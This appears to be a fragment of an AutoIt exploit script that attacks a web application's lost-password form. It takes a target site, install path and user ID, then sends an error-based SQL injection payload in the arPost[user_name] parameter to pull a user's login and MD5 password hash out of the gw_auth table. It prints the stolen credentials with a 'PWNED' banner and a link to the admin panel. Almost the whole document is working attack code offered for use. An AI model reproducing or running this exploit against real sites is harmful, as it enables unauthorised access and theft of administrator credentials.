if $CmdLine[0]=3 Then
$targetsite=$CmdLine[1];
$installdir=$CmdLine[2];
$uidtoattack=Number(StringMid($CmdLine[3],1,255));
EndIf
if not StringIsDigit($uidtoattack) Then
ConsoleWrite(' UID is wrong! Exit' );
Exit;
EndIf
if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then
ConsoleWrite('Are you kidding meeeeen?');
Exit;
EndIf
HttpSetUserAgent($useragent)
$doublecheck=InetGet($targetsite,'',1);
if @error Then
ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)
Exit;
EndIf
sleep(Random(1200,2500,1));
sendfakeretrivevalidsess($targetsite,$installdir)
HttpSetUserAgent($useragent);
$sidentify=_INetGetSource($targetsite & $adminpanel,True);
Func exploit($targetsite,$installdir,$sessid)
Global $sAddress = $targetsite
Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _
"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _
"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _
" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";
Global $sDomain = $targetsite
Global $sPage = $installdir & $vulnurl
Global $sAdditionalData = $PAYLOADTOSEND
Global $hOpen = _WinHttpOpen($useragent)
Global $hConnect = _WinHttpConnect($hOpen, $sDomain)
Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')
_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)
_WinHttpReceiveResponse($hRequest)
Global $sReturned
If _WinHttpQueryDataAvailable($hRequest) Then
Do
$sReturned &= _WinHttpReadData($hRequest)
Until @error
if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then
$zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1)
For $x = 0 To UBound($zsuxxv) - 1
Beep(100,1000);
ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _
StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _
_StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _
StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _
' [*] ' & _
StringReplace($triptrop,'#','-') & _
'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _
'[*] Good Luck;) [*]' & _
$triptrop & '[*] DONE [*]' & _
$triptrop);
Next
Else
ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _
' [*]' & $triptrop);
Beep(1500,1000);
Exit
EndIf
EndIf
_WinHttpCloseHandle($hRequest)
_WinHttpCloseHandle($hConnect)
_WinHttpCloseHandle($hOpen)
EndFunc;=> exploit();